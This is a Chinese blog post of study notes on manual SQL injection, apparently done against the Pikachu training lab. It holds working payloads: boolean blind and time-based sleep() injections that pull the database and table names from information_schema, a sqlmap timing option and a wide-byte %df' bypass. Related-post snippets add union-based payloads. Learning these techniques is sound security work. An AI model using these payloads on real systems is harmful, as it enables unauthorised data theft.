sql手工注入

已于 2022-07-07 21:11:56 修改
阅读量780 收藏 1
点赞数 1
文章标签: sql 数据库 database
于 2021-10-27 15:53:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50462604/article/details/120987262
版权

按照数据提交的方式来分类
友情链接:https://www.cnblogs.com/-chenxs/p/11614129.html、https://www.cnblogs.com/p0pl4r/p/10320631.html
(1)GET 注入
提交数据的方式是 GET , 注入点的位置在 GET 参数部分。比如有这样的一个链接http://xxx.com/news.php?id=1 , id 是注入点。

(2)POST 注入
使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。

(3)Cookie 注入
HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中。

(4)HTTP 头部注入
注入点在 HTTP 请求头部的某个字段中。比如存在 User-Agent 字段中。严格讲的话,Cookie 其实应该也是算头部注入的一种形式。因为在 HTTP 请求的时候,Cookie 是头部的一个字段。

https://www.cnblogs.com/0nth3way/articles/7093045.html
在这里插入图片描述

https://blog.csdn.net/qq_42526270/article/details/102729958
按照执行效果来分类

(1)

基于布尔的盲注

即可以根据返回页面判断条件真假的注入。
猜数据库长度–猜数据库名–猜表长度–猜表名–
在这里插入图片描述

数据库长度 
kobe' and length(database())=7# 
表名
kobe' and ascii(substr(database(),1,1))=112#  p
kobe' and ascii(substr(database(),2,1))=105#  i
kobe' and ascii(substr(database(),3,1))=107#  k
kobe' and ascii(substr(database(),4,1))=97#   a
kobe' and ascii(substr(database(),5,1))=99#   c
kobe' and ascii(substr(database(),6,1))=104#  h
kobe' and ascii(substr(database(),7,1))=117#  u

substr()是一个切片函数(字符串,开始位置,步长)
ascii()就是将字符转为ascii码值

数据库长度为7
数据库为pikachu

在这里插入图片描述
猜表长度

kobe' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,100)) =8#

首先最里面是一个查询语句,可以通过调整limit 后的数字查到每一个数据库的名字
外层是一个分片函数substr(字符串,开始位置,步长),字符串就是查询语句查出的数据库名,从1开始到100结束,是第一片。100的意义就是保证数据库名的完整性够大即可(一般稍大就可以,谁也不会把一个数据库名设置100多个字符串)
最后就是length()了通过和后面的判断语句配合来确定字符串的具体长度

在这里插入图片描述
猜表名

kobe' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 104#

在这里插入图片描述

(2)基于时间的盲注

即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
sqlmap进行延迟注入
--time-sec=5 时间盲注
在这里插入图片描述

https://zhuanlan.zhihu.com/p/413352033

如果kobe存在的话,这条命令会延迟5s之后执行
kobe' and sleep(5)#
猜数据库长度
kobe' and if((length(database()))=7,sleep(5),1)#
猜数据库名
kobe' and if(ascii(substr(database(),1,1))=112,sleep(5),1)#

(3)基于报错注入
即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

单引号
双引号
基于数字型注入
(4)联合查询注入
可以使用union的情况下的注入。

(5)堆查询注入
可以同时执行多条语句的执行时的注入。

(6)宽字节注入

%df\’ = %df%5c%27=縗’

%df'

在这里插入图片描述

admin:
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。 此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL手工注入漏洞测试(Sybase数据库)、SQL手工注入漏洞测试(SQLite数据库)、SQL手工注入漏洞测试(Db2数据库)、SQL注入漏洞测试(参数加密)、SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等。 sqlmap等sql注入工具不能利用的SQL注入点,可尝试手工注入,或许有意外的惊喜,满足你的sql注入欲望。 来吧,小伙伴,尽情的下载、然后肆无忌惮的尝试手工注入吧。 来吧,小伙伴,尽情的下载、然后肆无忌惮的尝试手工注入吧。 SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
手工SQL注入流程与常用语句_sql注入 手工(3),2024年最新看这篇文章准没错
最新发布
2401_83974199的博客
04-16 412
如下代码和截图所示,展示了获取数据库中表的信息,information_schema是MySql自带的信息数据库,用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等,其中的表实际上都是视图。进一步获取其中的字段名,假设要获取的表为users,如下面的代码和截图所示。information_schema的columns表存储了表中列的信息,也就是表中字段信息,指定table_name表名,即可获取到对应表的字段信息。是要截取的字符串,b是截取的位置,c是截取的长度。
SQL 手工注入
热门推荐
枫梓林のBlog
04-25 1万+
SQL 手工注入 文章目录SQL 手工注入0x01 SQL注入概述0x02 SQL 注入原理1.基本概述2.单引号的作用3.SQL 注入流程4.SQL 注入的基本分类3.常见注入方式分类0x03 部署 sqli-labs 学习环境1.sqli-labs 简介2.部署sqli-labs 实验环境2.1 搭建LAMP 环境2.2 检查安装的状态和启动服务2.3 配置 mysq 数据库 root 用户密码2.4 安装 sqli-labs 教学环境2.5 创建快照0x04 安装 hackbar 插件0x05 SQL
SQL手工注入
Megumiwind的博客
08-08 1701
什么是SQL注入SQLi,sql injection,称之为SQL注入。何为SQL,英文:Structured Query Language,又叫结构化查询语言,用户在输入中注入SQL语法,破坏原有的SQL结构,达到编写程序时意料之外结果的攻击行为,被称为sql注入。 如何找到SQL注入点: 黑盒测试: 看见URL中的动态参数就想搞点事情,概念性验证 工具跑,老夫就是江湖人称脚本小子的物种 扫描器(AWVS等)扫+手动验证 Burp抓流量,调用SQLMAP API验证 代码审计 ...
渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)
weixin_52796034的博客
10-09 1251
报错注入是一种特殊的SQL注入攻击方式,它利用了应用程序对异常处理的不完善,通过在输入的SQL语句中插入恶意的SQL语句,达到获取未授权数据的目的。 在报错注入中,我们可以通过在输入的数据中插入SQL语句的异常字符,使得应用程序抛出异常,从而获取应用程序的错误信息。这些错误信息可能包含了应用程序的敏感数据,如数据库表结构、列名、存储过程等。
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2021
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL手工注入完全篇
09-08
SQL手工注入完全篇
SQL手工注入实例
01-04
这是一个简单的小实例,供大家学习交流使用,通过简单的模仿使大家对注入技术有所了解,通过一次成功的注入,增加学习的兴趣
网站初级SQL手工注入
05-01
这里只是给出一个下载地址; 仅适合菜鸟观看,不懂SQL手工注入的人观看; 同时还列出了 用 Google 搜索网站后台的过程! 比较简单!
网络安全原理与应用:SQL手工注入.pptx
05-16
SQL手工注入一、SQL手工注入知识点任务通过SQL手工注入的方法获取admin的密码1、检查是否存在注入点2、猜解SQL查询语句的字段数3、获取数据库名称4、获取数据表名5、获取字段名6、获取字段数据SQL手工注入二、SQL...
DVWA-----SQL Injection(SQL手工注入
m0_65712192的博客
11-21 5555
DVWA-----SQL Injection(SQL手工注入
SQL注入详解(第二章手工注入
m0_52051132的博客
09-17 2642
mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,我当前的版本mysql 5.7.22。mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,按照user,db,tables_priv,columns_priv的顺序进行验证。
SQL手工注入总结
Fuzz
09-24 559
0x00、 前言 虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正!! 0x01、 Mysql 手工注入 1.1 联合注入 - ?id=1' order by 4--+ - ?id=0' union select 1,2,3,database()--+ - ?id=0' union se
sql手工注入实战
mulincong的博客
05-30 2135
sql手工注入封神台靶场
二、sql手工注入
黑日里不灭的light
11-22 1556
解释:想要进行sql注入,肯定要发现注入点,一般简单的sql注入通过下面两种方式判断就能发现是否存在sql注入漏洞。
SQL Server手工注入方式
good good study
01-04 5517
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
SQL注入总结(mysql
qq_52768407的博客
11-05 102
总结了一些sql注入的原理、产生原因、防御方式等关于sql注入的一些知识
sql手工注入 union
09-17
SQL手工注入是一种攻击技术,通过修改SQL查询语句来绕过应用程序的安全措施,并获取未授权的数据。其中,union查询是一种常用的手工注入技巧之一。通过使用union关键字,可以将两个或多个查询的结果合并在一起返回。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值